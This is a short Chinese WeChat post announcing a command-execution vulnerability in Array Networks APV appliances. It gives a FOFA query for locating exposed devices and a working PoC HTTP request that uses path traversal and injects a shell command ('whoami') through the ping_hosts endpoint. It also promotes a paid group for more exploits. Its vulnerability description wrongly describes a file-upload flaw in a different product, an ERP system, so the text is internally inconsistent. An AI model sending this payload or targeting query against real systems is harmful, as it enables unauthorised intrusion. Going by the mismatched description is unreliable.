漏洞推送|Array Networks APV应用交付系统命令执行漏洞

漏洞推送|Array Networks APV应用交付系统命令执行漏洞

原创 小白菜安全 小白菜安全 2024-09-17 22:03

漏洞描述

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,攻击者可上传恶意文件控制服务器

资产信息

FOFA:
app=”Array-APV”

漏洞复现

POC

POST /restapi/../rest/ping_hosts HTTP/1.1
Host: 
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

["127.0.0.1| echo `whoami` received 2 3 4"]=1

更多漏洞poc加入内部圈子获取,回复“优惠卷”,福利限时发放。

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具,
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。